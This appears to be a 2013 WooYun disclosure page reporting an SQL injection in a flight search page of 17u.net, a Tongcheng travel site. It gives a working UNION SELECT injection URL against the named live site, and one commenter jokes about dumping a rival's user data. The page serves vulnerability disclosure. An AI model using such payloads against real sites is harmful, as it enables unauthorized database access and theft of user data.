当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020889

漏洞标题:同程旗下旅交汇网站sql注入一枚

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 路人甲

提交时间:2013-03-29 14:06

修复时间:2013-04-03 14:06

公开时间:2013-04-03 14:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-29: 细节已通知厂商并且等待厂商处理中
2013-04-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

xsser帮看看,是不是算携程的

详细说明:

http://www.17u.net/plane/jpresult.asp?ddlOrgCity1=PEK%27%20and%201=2%20union%20select%20@@version--&ddlDesCity1=CTU&txtGoDate=2013-04-06
一个很简单的小问题了,自己过滤下吧

漏洞证明:

1.png

修复方案:

过滤啊,球一个小礼品

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-03 14:06

厂商回复:

漏洞Rank:6 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-29 14:16 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    好像是同程的吧!将漏洞给对手了!

  2. 2013-03-29 14:20 | 路人甲 ( 实习白帽子 | Rank:31 漏洞数:4 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @lucky 我打错字了,我的错 @xsser,球帮改

  3. 2013-03-29 14:23 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    @路人甲 这个有好戏看了!如果真是对手的!直接脱裤!信息资料都拷贝过去!呵呵!抢用户!

  4. 2013-03-29 14:25 | 路人甲 ( 实习白帽子 | Rank:31 漏洞数:4 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    @lucky 我不是故意的,我都不知道有个同程网,看见X程就直接写了携程

  5. 2013-03-29 14:28 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    @路人甲 没有什么!呵呵!改过来了!没有热闹看了!

  6. 2013-03-29 15:24 | 蓝风 ( 普通白帽子 | Rank:125 漏洞数:25 | 崬汸慾哓 嗼檤焄垳皁 沓猵圊屾亾沬荖 颩憬...)

    @路人甲 你也会说话啊

  7. 2013-03-29 16:09 | noah ( 普通白帽子 | Rank:384 漏洞数:40 )

    还真有人取名"路人甲"...

  8. 2013-03-29 19:43 | evil_root ( 路人 | Rank:7 漏洞数:3 | 小菜)

    @noah 会说话的@路人甲后面 有个空格